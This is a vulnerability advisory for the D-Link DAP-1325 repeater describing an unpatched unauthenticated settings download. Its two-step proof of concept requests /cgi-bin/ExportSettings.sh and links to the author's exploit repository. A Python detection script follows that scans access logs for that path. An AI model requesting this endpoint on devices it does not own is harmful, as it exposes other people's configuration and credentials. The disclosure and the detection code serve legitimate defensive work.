Vendor: D-Link DAP-1325
By: ieduardogoncalves
CVSS: 7.5 (HIGH)
Broken Access Control
CWE: 284
Product Name: D-Link DAP-1325
Affected Version From: All versions
Affected Version To: Hardware version: A1, Firmware version: 1.01
Patch Exists: NO
Related CWE:
CPE: h:d-link:dap-1325
Metasploit:
Other Scripts:
Platforms Tested: All Platforms
2023

D-Link DAP-1325 – Broken Access Control

D-Link DAP-1325 is affected by an unauthenticated configuration download vulnerability, also described as unauthenticated access to settings: the device allows the download of user settings without proper authentication.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to ensure that the DAP-1325 device is not exposed to untrusted networks and to regularly check for firmware updates from the vendor.

Exploit-DB raw data:

# Exploit Title: D-Link DAP-1325 - Broken Access Control
# Date: 27-06-2023
# Exploit Author: ieduardogoncalves
# Contact : twitter.com/0x00dia
# Vendor : www.dlink.com
# Version: Hardware version: A1 
# Firmware version: 1.01
# Tested on: All Platforms


1) Description

This is a security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.


In my case, tested repeater IP: http://192.168.0.21/

Video PoC: https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0

2) Proof of Concept

Step 1: Go to the repeater login page: http://192.168.0.21/

Step 2: Add the payload to the URL.

Payload:
http://{ip}/cgi-bin/ExportSettings.sh

Payload:
https://github.com/eeduardogoncalves/exploit
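
Since no patch exists, monitoring for requests to the export path is one of the few controls available. The following is an added detection example, not part of the original advisory or the author's code: it scans access logs for requests that reach `/cgi-bin/ExportSettings.sh` and separates served downloads from refused attempts. It assumes Common Log Format lines from a reverse proxy or network sensor in front of the repeater's web interface; the `admin_hosts` parameter and the sample lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Endpoint named in the proof of concept on this page, lower-cased for matching.
EXPORT_PATH = "/cgi-bin/exportsettings.sh"

# Common Log Format: host ident user [time] "METHOD target PROTO" status bytes
CLF = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def normalize(target):
    """Reduce a request target to a comparable lower-case path."""
    target = re.sub(r"^[a-zA-Z][a-zA-Z0-9+.-]*://[^/]*", "", target)  # absolute-form URI
    path = unquote(target.split("?", 1)[0].split("#", 1)[0])  # drop query, decode %xx
    path = re.sub(r"/+", "/", path) or "/"                    # collapse duplicate slashes
    return posixpath.normpath(path).lower()                   # resolve ./ and ../ (conservative match)

def find_export_requests(lines, admin_hosts=()):
    """Return one finding per request that reaches the settings export path."""
    findings = []
    for line in lines:
        m = CLF.match(line)
        if not m or normalize(m["target"]) != EXPORT_PATH:
            continue
        # A 2xx response with a body means the settings file was handed out.
        served = m["status"].startswith("2") and m["size"] not in ("-", "0")
        findings.append({
            "src": m["src"], "time": m["time"], "status": int(m["status"]),
            "severity": "disclosed" if served else "attempt",
            "from_admin_host": m["src"] in admin_hosts,  # hypothetical allowlist
        })
    return findings

# Constructed sample log lines (not captured from a real device).
SAMPLE = [
    '192.168.0.50 - - [27/Jun/2023:10:01:02 +0000] "GET / HTTP/1.1" 200 1834',
    '192.168.0.77 - - [27/Jun/2023:10:03:10 +0000] "GET /cgi-bin/ExportSettings.sh HTTP/1.1" 200 4096',
    '192.168.0.77 - - [27/Jun/2023:10:03:15 +0000] "GET //cgi-bin/%45xportSettings.sh?x=1 HTTP/1.1" 200 4096',
    '192.168.0.80 - - [27/Jun/2023:10:05:00 +0000] "GET /cgi-bin/ExportSettings.sh HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for finding in find_export_requests(SAMPLE, admin_hosts={"192.168.0.50"}):
        print(finding)
```

Any `disclosed` finding from a host outside the allowlist means the exported settings should be treated as exposed and any credentials they contain rotated.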